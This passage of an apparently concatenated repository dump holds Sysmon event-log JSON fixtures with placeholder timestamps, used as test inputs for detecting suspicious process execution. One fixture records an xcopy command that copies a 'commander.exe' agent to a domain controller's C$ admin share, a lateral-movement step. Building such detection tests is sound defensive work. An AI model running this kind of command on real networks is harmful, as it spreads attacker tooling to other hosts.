29 | "EventID": "7", 30 | "EventRecordID": "7682610", 31 | "Execution": { 32 | "ProcessID": "892", 33 | "ThreadID": "6868" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "7", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "3" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/UserTempExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\malware.exe\" ", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Windows Command Processor", 8 | "FileVersion": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", 9 | "Hashes": "SHA1=0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8,MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A", 10 | "Image": "C:\\Users\\calduser2\\AppData\\Local\\Temp\\Temp1_test.zip\\malware.exe", 11 | "IntegrityLevel": "Medium", 12 | "LogonGuid": "{49F1AF32-DC25-5B05-0000-00207EB50400}", 13 | "LogonId": "0x4b57e", 14 | "ParentCommandLine": "C:\\Windows\\Explorer.EXE", 15 | "ParentImage": "C:\\Windows\\explorer.exe", 16 | "ParentProcessGuid": "{49F1AF32-DC26-5B05-0000-001016DF0400}", 17 | "ParentProcessId": "2284", 18 | "ProcessGuid": "{49F1AF32-E29B-5B05-0000-001004911600}", 19 | "ProcessId": "1092", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "1", 22 | "User": "CALDERA\\calduser2", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": 
"Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "915850", 31 | "Execution": { 32 | "ProcessID": "1404", 33 | "ThreadID": "1732" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /tests/WindowsTempExec.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "C:\\Windows\\TEMP\\7276A569-F3A6-419B-8132-4804CA5A8E39\\dismhost.exe {322E3077-E172-4373-BAD6-0D79FD0E56C7}", 5 | "CurrentDirectory": "C:\\Windows\\system32\\", 6 | "Hashes": "SHA1=958BE7D02FCA674FB386482090B9A5024D0A1538,MD5=516A5FCE06BB388499238A5F9286CB74,SHA256=9A4B735603297448841758B29D3C387A4CE84E5FD0DAE05622F43CE53B8C85E6,IMPHASH=4814B0801D16B74A024E98A232D111D9", 7 | "Image": "C:\\Windows\\Temp\\7276A569-F3A6-419B-8132-4804CA5A8E39\\DismHost.exe", 8 | "IntegrityLevel": "System", 9 | "LogonGuid": "49F1AF32-4E56-59BD-0000-0020E7030000", 10 | "LogonId": "0x000003e7", 11 | "ParentCommandLine": "C:\\Windows\\system32\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:R4bMnmTMZEGdePAk.1", 12 | "ParentImage": "C:\\Windows\\System32\\CompatTelRunner.exe", 13 | "ParentProcessGuid": "49F1AF32-87C2-59C1-0000-0010AE963A00", 14 | "ParentProcessId": "4036", 15 | "ProcessGuid": "49F1AF32-8838-59C1-0000-0010C3C84700", 16 | "ProcessId": "3440", 17 | "TerminalSessionId": "0", 18 | "User": "NT AUTHORITY\\SYSTEM", 19 | "UtcTime": "4242-04-24 13:37:42.422" 20 | }, 21 | "System": { 22 | "Channel": 
"Microsoft-Windows-Sysmon/Operational", 23 | "Computer": "BLAHBLAH", 24 | "Correlation": {}, 25 | "EventID": "1", 26 | "EventRecordID": "811124", 27 | "Execution": { 28 | "ProcessID": "1332", 29 | "ThreadID": "1924" 30 | }, 31 | "Keywords": "0x8000000000000000", 32 | "Level": "4", 33 | "Opcode": "0", 34 | "Provider": { 35 | "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9", 36 | "Name": "Microsoft-Windows-Sysmon" 37 | }, 38 | "Security": { 39 | "UserID": "S-1-5-18" 40 | }, 41 | "Task": "1", 42 | "TimeCreated": { 43 | "SystemTime": "4242-04-24 13:37:42.422" 44 | }, 45 | "Version": "5" 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /tests/Xcopy.exe.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "xcopy C:\\commander.exe \\\\calderadc\\c$\\commander.exe", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Extended Copy Utility", 8 | "FileVersion": "6.1.7600.16385 (win7_rtm.090713-1255)", 9 | "Hashes": "SHA1=0A49CA5B46210824AC22D0B8DC43EF5E7B6D2989,MD5=20CF8728C55A8743AAC86FB8D30EA898,SHA256=32EE791AA61BFE60A28A788663E15376DA83D7B20E133F6F96F77C54F262FCC1,IMPHASH=46A0EA2A9F4C86BD33243A6B3C8ED68F", 10 | "Image": "C:\\Windows\\System32\\xcopy.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{49F1AF32-3AE3-5AC7-0000-002039031400}", 13 | "LogonId": "0x140339", 14 | "ParentCommandLine": "cmd.exe /c echo F | xcopy C:\\commander.exe \\\\calderadc\\c$\\commander.exe", 15 | "ParentImage": "C:\\Windows\\System32\\cmd.exe", 16 | "ParentProcessGuid": "{49F1AF32-3AE3-5AC7-0000-00107C031400}", 17 | "ParentProcessId": "2944", 18 | "ProcessGuid": "{49F1AF32-3AE3-5AC7-0000-00102D081400}", 19 | "ProcessId": "1216", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 
13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "914689", 31 | "Execution": { 32 | "ProcessID": "1456", 33 | "ThreadID": "1712" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | --------------------------------------------------------------------------------